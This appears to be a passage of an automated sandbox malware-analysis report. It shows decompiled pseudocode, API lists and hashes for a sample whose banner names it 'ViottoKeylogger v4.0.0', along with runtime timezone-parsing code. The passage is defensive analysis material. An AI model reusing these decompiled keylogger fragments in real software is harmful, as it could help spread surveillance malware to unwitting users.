                                                                                                                                      • Associated: 00000002.00000002.505631265.000000000132E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505681175.0000000001330000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_1300000_hjrypmyqervekvpteu.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 12e56d648ad3ec1fb63f4993729f7f329da860e64b39de74e82ae58ead1776c6
                                                                                                                                      • Instruction ID: ea8d770c169d24458f7eb2fa4391b635a84a72356e72d63d7b4566974e07a006
                                                                                                                                      • Opcode Fuzzy Hash: 12e56d648ad3ec1fb63f4993729f7f329da860e64b39de74e82ae58ead1776c6
                                                                                                                                      • Instruction Fuzzy Hash: D5C1D370A0425A9FEF29EFACC840BADBFB4BF59328F044189E554A7256C370D945CB60
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      C-Code - Quality: 38%
                                                                                                                                      			E01305E77(void* __ecx, void* __edx) {
                                                                                                                                      				int _t1;
                                                                                                                                      				void* _t9;
                                                                                                                                      				char* _t11;
                                                                                                                                      				void* _t14;
                                                                                                                                      
                                                                                                                                      				_t9 = __ecx;
                                                                                                                                      				_t1 = AllocConsole();
                                                                                                                                      				__imp__GetConsoleWindow();
                                                                                                                                      				 *0x132f5bc = _t1;
                                                                                                                                      				E01311EDC(_t9, "CONOUT$", "a", E0130E418(1));
                                                                                                                                      				_t11 = " * ----------------------\n";
                                                                                                                                      				E01305775(_t14);
                                                                                                                                      				E01305775(_t14, " * ViottoKeylogger v", _t11);
                                                                                                                                      				E01305775(_t14);
                                                                                                                                      				E01305775(_t14, "\n", "4.0.0");
                                                                                                                                      				_push(_t11);
                                                                                                                                      				return E01305775(_t14);
                                                                                                                                      			}







                                                                                                                                      0x01305e77
                                                                                                                                      0x01305e78
                                                                                                                                      0x01305e7e
                                                                                                                                      0x01305e86
                                                                                                                                      0x01305e9b
                                                                                                                                      0x01305ea0
                                                                                                                                      0x01305ea6
                                                                                                                                      0x01305eb0
                                                                                                                                      0x01305eba
                                                                                                                                      0x01305ec4
                                                                                                                                      0x01305ec9
                                                                                                                                      0x01305ed3

                                                                                                                                      APIs
                                                                                                                                      • AllocConsole.KERNEL32(C:\Users\user\AppData\Local\Temp\hjrypmyqervekvpteu.exe,01305A7B,?,?,00000018,0000001E,0000001D,C:\Users\user\AppData\Local\Temp\hjrypmyqervekvpteu.exe), ref: 01305E78
                                                                                                                                      • GetConsoleWindow.KERNEL32(?,?,00000018,0000001E,0000001D,C:\Users\user\AppData\Local\Temp\hjrypmyqervekvpteu.exe), ref: 01305E7E
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.505409012.0000000001301000.00000020.00000001.01000000.00000005.sdmp, Offset: 01300000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.505385438.0000000001300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505578317.0000000001324000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505631265.000000000132E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505681175.0000000001330000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_1300000_hjrypmyqervekvpteu.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Console$AllocWindow
                                                                                                                                      • String ID: * ----------------------$ * ViottoKeylogger v$4.0.0$C:\Users\user\AppData\Local\Temp\hjrypmyqervekvpteu.exe$CONOUT$
                                                                                                                                      • API String ID: 2980945747-1604447768
                                                                                                                                      • Opcode ID: ec74b6d381ddde1cdec6c2fb9f799bc40d3c1c958730ab4bac8d6ccee49258fe
                                                                                                                                      • Instruction ID: 075f2df7d26a40206117dfa566b1d897522f571a41a57e8060708c4e3c20895b
                                                                                                                                      • Opcode Fuzzy Hash: ec74b6d381ddde1cdec6c2fb9f799bc40d3c1c958730ab4bac8d6ccee49258fe
                                                                                                                                      • Instruction Fuzzy Hash: 4AE04F31944337FBC5273BBA7C5A98E32984F21F0DB010018F60866684F9E408811BB6
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      C-Code - Quality: 76%
                                                                                                                                      			E01318753(void* __ebx, void* __edi, signed int __esi, void* __eflags, signed int _a4) {
                                                                                                                                      				signed int _v8;
                                                                                                                                      				signed int _v12;
                                                                                                                                      				int _v16;
                                                                                                                                      				int _v20;
                                                                                                                                      				int _v24;
                                                                                                                                      				char _v52;
                                                                                                                                      				int _v56;
                                                                                                                                      				int _v60;
                                                                                                                                      				signed int _v100;
                                                                                                                                      				char _v272;
                                                                                                                                      				intOrPtr _v276;
                                                                                                                                      				char _v280;
                                                                                                                                      				char _v356;
                                                                                                                                      				char _v360;
                                                                                                                                      				void* __ebp;
                                                                                                                                      				signed int _t65;
                                                                                                                                      				signed int _t72;
                                                                                                                                      				signed int _t74;
                                                                                                                                      				signed int _t78;
                                                                                                                                      				signed int _t85;
                                                                                                                                      				signed int _t89;
                                                                                                                                      				signed int _t91;
                                                                                                                                      				long _t93;
                                                                                                                                      				signed int* _t96;
                                                                                                                                      				signed int _t99;
                                                                                                                                      				signed int _t102;
                                                                                                                                      				signed int _t106;
                                                                                                                                      				void* _t113;
                                                                                                                                      				signed int _t116;
                                                                                                                                      				void* _t117;
                                                                                                                                      				void* _t119;
                                                                                                                                      				void* _t120;
                                                                                                                                      				void* _t122;
                                                                                                                                      				signed int _t124;
                                                                                                                                      				signed int _t125;
                                                                                                                                      				signed int* _t128;
                                                                                                                                      				signed int _t129;
                                                                                                                                      				void* _t132;
                                                                                                                                      				void* _t134;
                                                                                                                                      				signed int _t135;
                                                                                                                                      				signed int _t137;
                                                                                                                                      				void* _t140;
                                                                                                                                      				intOrPtr _t141;
                                                                                                                                      				void* _t143;
                                                                                                                                      				signed int _t150;
                                                                                                                                      				signed int _t151;
                                                                                                                                      				signed int _t154;
                                                                                                                                      				signed int _t158;
                                                                                                                                      				signed int _t161;
                                                                                                                                      				intOrPtr* _t166;
                                                                                                                                      				signed int _t167;
                                                                                                                                      				intOrPtr* _t168;
                                                                                                                                      				void* _t169;
                                                                                                                                      				intOrPtr _t170;
                                                                                                                                      				void* _t171;
                                                                                                                                      				signed int _t172;
                                                                                                                                      				int _t176;
                                                                                                                                      				signed int _t178;
                                                                                                                                      				char** _t179;
                                                                                                                                      				signed int _t183;
                                                                                                                                      				signed int _t184;
                                                                                                                                      				void* _t191;
                                                                                                                                      				signed int _t192;
                                                                                                                                      				void* _t193;
                                                                                                                                      				signed int _t194;
                                                                                                                                      
                                                                                                                                      				_t178 = __esi;
                                                                                                                                      				_t171 = __edi;
                                                                                                                                      				_t65 = E0131811E();
                                                                                                                                      				_v8 = _v8 & 0x00000000;
                                                                                                                                      				_t137 = _t65;
                                                                                                                                      				_v16 = _v16 & 0x00000000;
                                                                                                                                      				_v12 = _t137;
                                                                                                                                      				if(E0131817C( &_v8) != 0 || E01318124( &_v16) != 0) {
                                                                                                                                      					L46:
                                                                                                                                      					_push(0);
                                                                                                                                      					_push(0);
                                                                                                                                      					_push(0);
                                                                                                                                      					_push(0);
                                                                                                                                      					_push(0);
                                                                                                                                      					E013110E6();
                                                                                                                                      					asm("int3");
                                                                                                                                      					_t191 = _t193;
                                                                                                                                      					_t194 = _t193 - 0x10;
                                                                                                                                      					_push(_t137);
                                                                                                                                      					_t179 = E0131811E();
                                                                                                                                      					_v52 = 0;
                                                                                                                                      					_v56 = 0;
                                                                                                                                      					_v60 = 0;
                                                                                                                                      					_t72 = E0131817C( &_v52);
                                                                                                                                      					_t143 = _t178;
                                                                                                                                      					__eflags = _t72;
                                                                                                                                      					if(_t72 != 0) {
                                                                                                                                      						L66:
                                                                                                                                      						_push(0);
                                                                                                                                      						_push(0);
                                                                                                                                      						_push(0);
                                                                                                                                      						_push(0);
                                                                                                                                      						_push(0);
                                                                                                                                      						E013110E6();
                                                                                                                                      						asm("int3");
                                                                                                                                      						_push(_t191);
                                                                                                                                      						_t192 = _t194;
                                                                                                                                      						_t74 =  *0x132e00c; // 0x17120af4
                                                                                                                                      						_v100 = _t74 ^ _t192;
                                                                                                                                      						 *0x132e2ac =  *0x132e2ac | 0xffffffff;
                                                                                                                                      						 *0x132e2a0 =  *0x132e2a0 | 0xffffffff;
                                                                                                                                      						_push(0);
                                                                                                                                      						_push(_t179);
                                                                                                                                      						_push(_t171);
                                                                                                                                      						_t139 = "TZ";
                                                                                                                                      						_t172 = 0;
                                                                                                                                      						 *0x132f488 = 0;
                                                                                                                                      						_t78 = E01311D7F("TZ", 0, __eflags,  &_v360,  &_v356, 0x100, "TZ");
                                                                                                                                      						__eflags = _t78;
                                                                                                                                      						if(_t78 != 0) {
                                                                                                                                      							__eflags = _t78 - 0x22;
                                                                                                                                      							if(_t78 == 0x22) {
                                                                                                                                      								_t184 = E013151CD(_t143, _v276);
                                                                                                                                      								__eflags = _t184;
                                                                                                                                      								if(__eflags != 0) {
                                                                                                                                      									_t85 = E01311D7F(_t139, 0, __eflags,  &_v280, _t184, _v276, _t139);
                                                                                                                                      									__eflags = _t85;
                                                                                                                                      									if(_t85 == 0) {
                                                                                                                                      										E01314615(0);
                                                                                                                                      										_t172 = _t184;
                                                                                                                                      									} else {
                                                                                                                                      										_push(_t184);
                                                                                                                                      										goto L72;
                                                                                                                                      									}
                                                                                                                                      								} else {
                                                                                                                                      									_push(0);
                                                                                                                                      									L72:
                                                                                                                                      									E01314615();
                                                                                                                                      								}
                                                                                                                                      							}
                                                                                                                                      						} else {
                                                                                                                                      							_t172 =  &_v272;
                                                                                                                                      						}
                                                                                                                                      						asm("sbb esi, esi");
                                                                                                                                      						_t183 =  ~(_t172 -  &_v272) & _t172;
                                                                                                                                      						__eflags = _t172;
                                                                                                                                      						if(_t172 == 0) {
                                                                                                                                      							L80:
                                                                                                                                      							L47();
                                                                                                                                      						} else {
                                                                                                                                      							__eflags =  *_t172;
                                                                                                                                      							if(__eflags == 0) {
                                                                                                                                      								goto L80;
                                                                                                                                      							} else {
                                                                                                                                      								_push(_t172);
                                                                                                                                      								E01318753(_t139, _t172, _t183, __eflags);
                                                                                                                                      							}
                                                                                                                                      						}
                                                                                                                                      						E01314615(_t183);
                                                                                                                                      						__eflags = _v16 ^ _t192;
                                                                                                                                      						return E0130A07B(_v16 ^ _t192);
                                                                                                                                      					} else {
                                                                                                                                      						_t89 = E01318124( &_v16);
                                                                                                                                      						_pop(_t143);
                                                                                                                                      						__eflags = _t89;
                                                                                                                                      						if(_t89 != 0) {
                                                                                                                                      							goto L66;
                                                                                                                                      						} else {
                                                                                                                                      							_t91 = E01318150( &_v20);
                                                                                                                                      							_pop(_t143);
                                                                                                                                      							__eflags = _t91;
                                                                                                                                      							if(_t91 != 0) {
                                                                                                                                      								goto L66;
                                                                                                                                      							} else {
                                                                                                                                      								E01314615( *0x132f484);
                                                                                                                                      								 *0x132f484 = 0;
                                                                                                                                      								 *_t194 = 0x132f490;
                                                                                                                                      								_t93 = GetTimeZoneInformation(??);
                                                                                                                                      								__eflags = _t93 - 0xffffffff;
                                                                                                                                      								if(_t93 != 0xffffffff) {
                                                                                                                                      									_t150 =  *0x132f490 * 0x3c;
                                                                                                                                      									_t167 =  *0x132f4e4; // 0x0
                                                                                                                                      									_push(_t171);
                                                                                                                                      									 *0x132f488 = 1;
                                                                                                                                      									_v12 = _t150;
                                                                                                                                      									__eflags =  *0x132f4d6; // 0x0
                                                                                                                                      									if(__eflags != 0) {
                                                                                                                                      										_t151 = _t150 + _t167 * 0x3c;
                                                                                                                                      										__eflags = _t151;
                                                                                                                                      										_v12 = _t151;
                                                                                                                                      									}
                                                                                                                                      									__eflags =  *0x132f52a; // 0x0
                                                                                                                                      									if(__eflags == 0) {
                                                                                                                                      										L56:
                                                                                                                                      										_v16 = 0;
                                                                                                                                      										_v20 = 0;
                                                                                                                                      									} else {
                                                                                                                                      										_t106 =  *0x132f538; // 0x0
                                                                                                                                      										__eflags = _t106;
                                                                                                                                      										if(_t106 == 0) {
                                                                                                                                      											goto L56;
                                                                                                                                      										} else {
                                                                                                                                      											_v16 = 1;
                                                                                                                                      											_v20 = (_t106 - _t167) * 0x3c;
                                                                                                                                      										}
                                                                                                                                      									}
                                                                                                                                      									_t176 = E0131A9D4(0, _t167);
                                                                                                                                      									_t99 = WideCharToMultiByte(_t176, 0, 0x132f494, 0xffffffff,  *_t179, 0x3f, 0,  &_v24);
                                                                                                                                      									__eflags = _t99;
                                                                                                                                      									if(_t99 == 0) {
                                                                                                                                      										L60:
                                                                                                                                      										 *( *_t179) = 0;
                                                                                                                                      									} else {
                                                                                                                                      										__eflags = _v24;
                                                                                                                                      										if(_v24 != 0) {
                                                                                                                                      											goto L60;
                                                                                                                                      										} else {
                                                                                                                                      											( *_t179)[0x3f] = 0;
                                                                                                                                      										}
                                                                                                                                      									}
                                                                                                                                      									_t102 = WideCharToMultiByte(_t176, 0, 0x132f4e8, 0xffffffff, _t179[1], 0x3f, 0,  &_v24);
                                                                                                                                      									__eflags = _t102;
                                                                                                                                      									if(_t102 == 0) {
                                                                                                                                      										L64:
                                                                                                                                      										 *(_t179[1]) = 0;
                                                                                                                                      									} else {
                                                                                                                                      										__eflags = _v24;
                                                                                                                                      										if(_v24 != 0) {
                                                                                                                                      											goto L64;
                                                                                                                                      										} else {
                                                                                                                                      											_t179[1][0x3f] = 0;
                                                                                                                                      										}
                                                                                                                                      									}
                                                                                                                                      								}
                                                                                                                                      								 *(E01318118()) = _v12;
                                                                                                                                      								 *((intOrPtr*)(E0131810C())) = _v16;
                                                                                                                                      								_t96 = E01318112();
                                                                                                                                      								 *_t96 = _v20;
                                                                                                                                      								return _t96;
                                                                                                                                      							}
                                                                                                                                      						}
                                                                                                                                      					}
                                                                                                                                      				} else {
                                                                                                                                      					_t168 =  *0x132f484; // 0x0
                                                                                                                                      					_t178 = _a4;
                                                                                                                                      					if(_t168 == 0) {
                                                                                                                                      						L12:
                                                                                                                                      						E01314615(_t168);
                                                                                                                                      						_t154 = _t178;
                                                                                                                                      						_t12 = _t154 + 1; // 0x1318b44
                                                                                                                                      						_t169 = _t12;
                                                                                                                                      						do {
                                                                                                                                      							_t113 =  *_t154;
                                                                                                                                      							_t154 = _t154 + 1;
                                                                                                                                      						} while (_t113 != 0);
                                                                                                                                      						_t13 = _t154 - _t169 + 1; // 0x1318b45
                                                                                                                                      						 *0x132f484 = E013151CD(_t154 - _t169, _t13);
                                                                                                                                      						_t116 = E01314615(0);
                                                                                                                                      						_t170 =  *0x132f484; // 0x0
                                                                                                                                      						if(_t170 == 0) {
                                                                                                                                      							goto L45;
                                                                                                                                      						} else {
                                                                                                                                      							_t158 = _t178;
                                                                                                                                      							_push(_t171);
                                                                                                                                      							_t14 = _t158 + 1; // 0x1318b44
                                                                                                                                      							_t171 = _t14;
                                                                                                                                      							do {
                                                                                                                                      								_t117 =  *_t158;
                                                                                                                                      								_t158 = _t158 + 1;
                                                                                                                                      							} while (_t117 != 0);
                                                                                                                                      							_t15 = _t158 - _t171 + 1; // 0x1318b45
                                                                                                                                      							_t119 = E01313AEF(_t170, _t15, _t178);
                                                                                                                                      							_t193 = _t193 + 0xc;
                                                                                                                                      							if(_t119 == 0) {
                                                                                                                                      								_t171 = 3;
                                                                                                                                      								_push(_t171);
                                                                                                                                      								_t120 = E0131F2ED(_t159,  *_t137, 0x40, _t178);
                                                                                                                                      								_t193 = _t193 + 0x10;
                                                                                                                                      								if(_t120 == 0) {
                                                                                                                                      									while( *_t178 != 0) {
                                                                                                                                      										_t178 = _t178 + 1;
                                                                                                                                      										_t171 = _t171 - 1;
                                                                                                                                      										if(_t171 != 0) {
                                                                                                                                      											continue;
                                                                                                                                      										}
                                                                                                                                      										break;
                                                                                                                                      									}
                                                                                                                                      									_pop(_t171);
                                                                                                                                      									_t137 = _t137 & 0xffffff00 |  *_t178 == 0x0000002d;
                                                                                                                                      									if(_t137 != 0) {
                                                                                                                                      										_t178 = _t178 + 1;
                                                                                                                                      									}
                                                                                                                                      									_t161 = E01311AD3(_t159, _t178) * 0xe10;
                                                                                                                                      									_v8 = _t161;
                                                                                                                                      									while(1) {
                                                                                                                                      										_t122 =  *_t178;
                                                                                                                                      										if(_t122 != 0x2b && (_t122 < 0x30 || _t122 > 0x39)) {
                                                                                                                                      											break;
                                                                                                                                      										}
                                                                                                                                      										_t178 = _t178 + 1;
                                                                                                                                      									}
                                                                                                                                      									__eflags =  *_t178 - 0x3a;
                                                                                                                                      									if( *_t178 == 0x3a) {
                                                                                                                                      										_t178 = _t178 + 1;
                                                                                                                                      										_t161 = _v8 + E01311AD3(_t161, _t178) * 0x3c;
                                                                                                                                      										_v8 = _t161;
                                                                                                                                      										while(1) {
                                                                                                                                      											_t132 =  *_t178;
                                                                                                                                      											__eflags = _t132 - 0x30;
                                                                                                                                      											if(_t132 < 0x30) {
                                                                                                                                      												break;
                                                                                                                                      											}
                                                                                                                                      											__eflags = _t132 - 0x39;
                                                                                                                                      											if(_t132 <= 0x39) {
                                                                                                                                      												_t178 = _t178 + 1;
                                                                                                                                      												__eflags = _t178;
                                                                                                                                      												continue;
                                                                                                                                      											}
                                                                                                                                      											break;
                                                                                                                                      										}
                                                                                                                                      										__eflags =  *_t178 - 0x3a;
                                                                                                                                      										if( *_t178 == 0x3a) {
                                                                                                                                      											_t178 = _t178 + 1;
                                                                                                                                      											_t161 = _v8 + E01311AD3(_t161, _t178);
                                                                                                                                      											_v8 = _t161;
                                                                                                                                      											while(1) {
                                                                                                                                      												_t134 =  *_t178;
                                                                                                                                      												__eflags = _t134 - 0x30;
                                                                                                                                      												if(_t134 < 0x30) {
                                                                                                                                      													goto L38;
                                                                                                                                      												}
                                                                                                                                      												__eflags = _t134 - 0x39;
                                                                                                                                      												if(_t134 <= 0x39) {
                                                                                                                                      													_t178 = _t178 + 1;
                                                                                                                                      													__eflags = _t178;
                                                                                                                                      													continue;
                                                                                                                                      												}
                                                                                                                                      												goto L38;
                                                                                                                                      											}
                                                                                                                                      										}
                                                                                                                                      									}
                                                                                                                                      									L38:
                                                                                                                                      									__eflags = _t137;
                                                                                                                                      									if(_t137 != 0) {
                                                                                                                                      										_v8 = _t161;
                                                                                                                                      									}
                                                                                                                                      									__eflags =  *_t178;
                                                                                                                                      									_t124 = 0 |  *_t178 != 0x00000000;
                                                                                                                                      									_v16 = _t124;
                                                                                                                                      									__eflags = _t124;
                                                                                                                                      									_t125 = _v12;
                                                                                                                                      									if(_t124 == 0) {
                                                                                                                                      										_t29 = _t125 + 4; // 0xfffffddd
                                                                                                                                      										 *((char*)( *_t29)) = 0;
                                                                                                                                      										L44:
                                                                                                                                      										 *(E01318118()) = _v8;
                                                                                                                                      										_t128 = E0131810C();
                                                                                                                                      										 *_t128 = _v16;
                                                                                                                                      										return _t128;
                                                                                                                                      									}
                                                                                                                                      									_push(3);
                                                                                                                                      									_t28 = _t125 + 4; // 0xfffffddd
                                                                                                                                      									_t129 = E0131F2ED(_t161,  *_t28, 0x40, _t178);
                                                                                                                                      									_t193 = _t193 + 0x10;
                                                                                                                                      									__eflags = _t129;
                                                                                                                                      									if(_t129 == 0) {
                                                                                                                                      										goto L44;
                                                                                                                                      									}
                                                                                                                                      								}
                                                                                                                                      							}
                                                                                                                                      							goto L46;
                                                                                                                                      						}
                                                                                                                                      					} else {
                                                                                                                                      						_t166 = _t168;
                                                                                                                                      						_t135 = _t178;
                                                                                                                                      						while(1) {
                                                                                                                                      							_t140 =  *_t135;
                                                                                                                                      							if(_t140 !=  *_t166) {
                                                                                                                                      								break;
                                                                                                                                      							}
                                                                                                                                      							if(_t140 == 0) {
                                                                                                                                      								L8:
                                                                                                                                      								_t116 = 0;
                                                                                                                                      							} else {
                                                                                                                                      								_t9 = _t135 + 1; // 0xdde805eb
                                                                                                                                      								_t141 =  *_t9;
                                                                                                                                      								if(_t141 !=  *((intOrPtr*)(_t166 + 1))) {
                                                                                                                                      									break;
                                                                                                                                      								} else {
                                                                                                                                      									_t135 = _t135 + 2;
                                                                                                                                      									_t166 = _t166 + 2;
                                                                                                                                      									if(_t141 != 0) {
                                                                                                                                      										continue;
                                                                                                                                      									} else {
                                                                                                                                      										goto L8;
                                                                                                                                      									}
                                                                                                                                      								}
                                                                                                                                      							}
                                                                                                                                      							L10:
                                                                                                                                      							if(_t116 == 0) {
                                                                                                                                      								L45:
                                                                                                                                      								return _t116;
                                                                                                                                      							} else {
                                                                                                                                      								_t137 = _v12;
                                                                                                                                      								goto L12;
                                                                                                                                      							}
                                                                                                                                      							goto L82;
                                                                                                                                      						}
                                                                                                                                      						asm("sbb eax, eax");
                                                                                                                                      						_t116 = _t135 | 0x00000001;
                                                                                                                                      						__eflags = _t116;
                                                                                                                                      						goto L10;
                                                                                                                                      					}
                                                                                                                                      				}
                                                                                                                                      				L82:
                                                                                                                                      			}




































































                                                                                                                                      0x01318753
                                                                                                                                      0x01318753
                                                                                                                                      0x0131875d
                                                                                                                                      0x01318762
                                                                                                                                      0x01318766
                                                                                                                                      0x01318768
                                                                                                                                      0x01318770
                                                                                                                                      0x0131877b
                                                                                                                                      0x0131891b
                                                                                                                                      0x0131891d
                                                                                                                                      0x0131891e
                                                                                                                                      0x0131891f
                                                                                                                                      0x01318920
                                                                                                                                      0x01318921
                                                                                                                                      0x01318922
                                                                                                                                      0x01318927
                                                                                                                                      0x0131892b
                                                                                                                                      0x0131892d
                                                                                                                                      0x01318930
                                                                                                                                      0x01318937
                                                                                                                                      0x0131893e
                                                                                                                                      0x01318942
                                                                                                                                      0x01318945
                                                                                                                                      0x01318948
                                                                                                                                      0x0131894d
                                                                                                                                      0x0131894e
                                                                                                                                      0x01318950
                                                                                                                                      0x01318a78
                                                                                                                                      0x01318a78
                                                                                                                                      0x01318a79
                                                                                                                                      0x01318a7a
                                                                                                                                      0x01318a7b
                                                                                                                                      0x01318a7c
                                                                                                                                      0x01318a7d
                                                                                                                                      0x01318a82
                                                                                                                                      0x01318a85
                                                                                                                                      0x01318a86
                                                                                                                                      0x01318a8e
                                                                                                                                      0x01318a95
                                                                                                                                      0x01318a98
                                                                                                                                      0x01318aa5
                                                                                                                                      0x01318aac
                                                                                                                                      0x01318aad
                                                                                                                                      0x01318aae
                                                                                                                                      0x01318aaf
                                                                                                                                      0x01318ab4
                                                                                                                                      0x01318ac3
                                                                                                                                      0x01318aca
                                                                                                                                      0x01318ad2
                                                                                                                                      0x01318ad4
                                                                                                                                      0x01318ade
                                                                                                                                      0x01318ae1
                                                                                                                                      0x01318aee
                                                                                                                                      0x01318af1
                                                                                                                                      0x01318af3
                                                                                                                                      0x01318b0c
                                                                                                                                      0x01318b14
                                                                                                                                      0x01318b16
                                                                                                                                      0x01318b1c
                                                                                                                                      0x01318b21
                                                                                                                                      0x01318b18
                                                                                                                                      0x01318b18
                                                                                                                                      0x00000000
                                                                                                                                      0x01318b18
                                                                                                                                      0x01318af5
                                                                                                                                      0x01318af5
                                                                                                                                      0x01318af6
                                                                                                                                      0x01318af6
                                                                                                                                      0x01318af6
                                                                                                                                      0x01318b23
                                                                                                                                      0x01318ad6
                                                                                                                                      0x01318ad6
                                                                                                                                      0x01318ad6
                                                                                                                                      0x01318b30
                                                                                                                                      0x01318b32
                                                                                                                                      0x01318b34
                                                                                                                                      0x01318b36
                                                                                                                                      0x01318b46
                                                                                                                                      0x01318b46
                                                                                                                                      0x01318b38
                                                                                                                                      0x01318b38
                                                                                                                                      0x01318b3b
                                                                                                                                      0x00000000
                                                                                                                                      0x01318b3d
                                                                                                                                      0x01318b3d
                                                                                                                                      0x01318b3e
                                                                                                                                      0x01318b43
                                                                                                                                      0x01318b3b
                                                                                                                                      0x01318b4c
                                                                                                                                      0x01318b57
                                                                                                                                      0x01318b62
                                                                                                                                      0x01318956
                                                                                                                                      0x0131895a
                                                                                                                                      0x0131895f
                                                                                                                                      0x01318960
                                                                                                                                      0x01318962
                                                                                                                                      0x00000000
                                                                                                                                      0x01318968
                                                                                                                                      0x0131896c
                                                                                                                                      0x01318971
                                                                                                                                      0x01318972
                                                                                                                                      0x01318974
                                                                                                                                      0x00000000
                                                                                                                                      0x0131897a
                                                                                                                                      0x01318980
                                                                                                                                      0x01318985
                                                                                                                                      0x0131898b
                                                                                                                                      0x01318992
                                                                                                                                      0x01318998
                                                                                                                                      0x0131899b
                                                                                                                                      0x013189a1
                                                                                                                                      0x013189a8
                                                                                                                                      0x013189ae
                                                                                                                                      0x013189b2
                                                                                                                                      0x013189b8
                                                                                                                                      0x013189bb
                                                                                                                                      0x013189c2
                                                                                                                                      0x013189c7
                                                                                                                                      0x013189c7
                                                                                                                                      0x013189c9
                                                                                                                                      0x013189c9
                                                                                                                                      0x013189cc
                                                                                                                                      0x013189d3
                                                                                                                                      0x013189eb
                                                                                                                                      0x013189eb
                                                                                                                                      0x013189ee
                                                                                                                                      0x013189d5
                                                                                                                                      0x013189d5
                                                                                                                                      0x013189da
                                                                                                                                      0x013189dc
                                                                                                                                      0x00000000
                                                                                                                                      0x013189de
                                                                                                                                      0x013189e0
                                                                                                                                      0x013189e6
                                                                                                                                      0x013189e6
                                                                                                                                      0x013189dc
                                                                                                                                      0x013189f6
                                                                                                                                      0x01318a0a
                                                                                                                                      0x01318a10
                                                                                                                                      0x01318a12
                                                                                                                                      0x01318a20
                                                                                                                                      0x01318a22
                                                                                                                                      0x01318a14
                                                                                                                                      0x01318a14
                                                                                                                                      0x01318a17
                                                                                                                                      0x00000000
                                                                                                                                      0x01318a19
                                                                                                                                      0x01318a1b
                                                                                                                                      0x01318a1b
                                                                                                                                      0x01318a17
                                                                                                                                      0x01318a37
                                                                                                                                      0x01318a3e
                                                                                                                                      0x01318a40
                                                                                                                                      0x01318a4f
                                                                                                                                      0x01318a52
                                                                                                                                      0x01318a42
                                                                                                                                      0x01318a42
                                                                                                                                      0x01318a45
                                                                                                                                      0x00000000
                                                                                                                                      0x01318a47
                                                                                                                                      0x01318a4a
                                                                                                                                      0x01318a4a
                                                                                                                                      0x01318a45
                                                                                                                                      0x01318a40
                                                                                                                                      0x01318a5c
                                                                                                                                      0x01318a66
                                                                                                                                      0x01318a6b
                                                                                                                                      0x01318a70
                                                                                                                                      0x01318a77
                                                                                                                                      0x01318a77
                                                                                                                                      0x01318974
                                                                                                                                      0x01318962
                                                                                                                                      0x01318793
                                                                                                                                      0x01318793
                                                                                                                                      0x01318799
                                                                                                                                      0x0131879e
                                                                                                                                      0x013187d4
                                                                                                                                      0x013187d5
                                                                                                                                      0x013187db
                                                                                                                                      0x013187dd
                                                                                                                                      0x013187dd
                                                                                                                                      0x013187e0
                                                                                                                                      0x013187e0
                                                                                                                                      0x013187e2
                                                                                                                                      0x013187e3
                                                                                                                                      0x013187e9
                                                                                                                                      0x013187f4
                                                                                                                                      0x013187f9
                                                                                                                                      0x013187fe
                                                                                                                                      0x01318808
                                                                                                                                      0x00000000
                                                                                                                                      0x0131880e
                                                                                                                                      0x0131880e
                                                                                                                                      0x01318810
                                                                                                                                      0x01318811
                                                                                                                                      0x01318811
                                                                                                                                      0x01318814
                                                                                                                                      0x01318814
                                                                                                                                      0x01318816
                                                                                                                                      0x01318817
                                                                                                                                      0x0131881e
                                                                                                                                      0x01318823
                                                                                                                                      0x01318828
                                                                                                                                      0x0131882d
                                                                                                                                      0x01318835
                                                                                                                                      0x01318836
                                                                                                                                      0x0131883c
                                                                                                                                      0x01318841
                                                                                                                                      0x01318846
                                                                                                                                      0x0131884c
                                                                                                                                      0x01318851
                                                                                                                                      0x01318852
                                                                                                                                      0x01318855
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x01318855
                                                                                                                                      0x0131885a
                                                                                                                                      0x0131885b
                                                                                                                                      0x01318860
                                                                                                                                      0x01318862
                                                                                                                                      0x01318862
                                                                                                                                      0x0131886a
                                                                                                                                      0x01318870
                                                                                                                                      0x01318873
                                                                                                                                      0x01318873
                                                                                                                                      0x01318877
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x01318881
                                                                                                                                      0x01318881
                                                                                                                                      0x01318884
                                                                                                                                      0x01318887
                                                                                                                                      0x01318889
                                                                                                                                      0x01318897
                                                                                                                                      0x01318899
                                                                                                                                      0x013188a3
                                                                                                                                      0x013188a3
                                                                                                                                      0x013188a5
                                                                                                                                      0x013188a7
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0131889e
                                                                                                                                      0x013188a0
                                                                                                                                      0x013188a2
                                                                                                                                      0x013188a2
                                                                                                                                      0x00000000
                                                                                                                                      0x013188a2
                                                                                                                                      0x00000000
                                                                                                                                      0x013188a0
                                                                                                                                      0x013188a9
                                                                                                                                      0x013188ac
                                                                                                                                      0x013188ae
                                                                                                                                      0x013188b9
                                                                                                                                      0x013188bb
                                                                                                                                      0x013188c5
                                                                                                                                      0x013188c5
                                                                                                                                      0x013188c7
                                                                                                                                      0x013188c9
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x013188c0
                                                                                                                                      0x013188c2
                                                                                                                                      0x013188c4
                                                                                                                                      0x013188c4
                                                                                                                                      0x00000000
                                                                                                                                      0x013188c4
                                                                                                                                      0x00000000
                                                                                                                                      0x013188c2
